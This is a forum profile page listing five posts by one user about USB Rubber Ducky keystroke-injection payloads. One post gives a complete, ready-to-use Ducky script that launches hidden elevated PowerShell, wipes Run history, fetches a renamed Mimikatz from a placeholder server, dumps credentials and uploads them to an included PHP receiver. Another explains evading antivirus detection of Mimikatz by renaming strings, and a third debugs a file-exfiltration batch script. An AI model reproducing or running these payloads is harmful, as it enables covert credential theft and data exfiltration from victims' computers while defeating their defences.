Jump to content

Sh4d0wm4n

Members
  • Posts

    5
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Sh4d0wm4n's Achievements

Newbie

Newbie (1/14)

  1. As far as I know, the ducky-decode scripts allows just to decode a bin to its original ducky script. How can you add mass storage/multiple payloads with it? Sorry fo replying with another question ;)
  2. Hello everybody, you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link: https://goo.gl/FoLS0P While this is the Duck script: DELAY 1000 GUI r DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 500 REM ALT y LEFTARROW DELAY 300 ENTER DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit ENTER And this is the rx.php file content, you need to put on your server to receive the credentials: <?php date_default_timezone_set('Europe/Rome'); $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt"; file_put_contents($file, file_get_contents("php://input")); ?>
  3. I forgot to mention also that the minimum columns number for a powershell window is now 20. No more 18, or it will not shrink. P.S. Is there a way to edit a post after posting it?! I cannot find it.
  4. His script is not out of order, it is in fact exactly the new version introduced in this very useful post from the OP. The history cleaning is performed only when the powershell process shuts down/exits. ;) For your info, many AV, included Windows Defender, are now able to detect the invoke-mimikatz.ps1 script. But never trust your AV too much, as there is always an easy workaround ;) Check this post for detailed instructions: http://www.blackhillsinfosec.com/?p=5555 Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?). I've also found an alternate and lighter version (400K vs 2.5Mb) of the original invoke-mimikatz script, that is not detected as well: but with this one you need to type the commands interactively: no --DumpCreds switch. Here: https://gist.github.com/subTee/0a3b56ac743e8d1eeab0 I've already tested both and they work like a charme, until a future 'cheap' AV update... ;)
  5. Hello everyone, I'm talking about this recent payload: https://www.hak5.org/blog/hak5/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained The bug is in the e.cmd file, where the folder name is created, depending on date and time: REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% Thanks to the fact that I always do my hacking homeworks in the night, I discovered that the time is not always 11 characters long, in fact it could be like this: 2:34:54 instead of 02:34:54. So, if you are executing the script in the night, you'll have a folder name containing an empty character, like NAME_10122017_ 23454, and this is causing issues later when the scrip has to copy the files to this folder. The responsible script part is this: %time:~-11,2%, where it always goes back 11 characters to get the first two numbers, but it finds just one. I did not have the time to modify it to make it work every"time" ;), but it should be easy to do. I just wanted all of you to know about it ;) Cheers
×
×
  • Create New...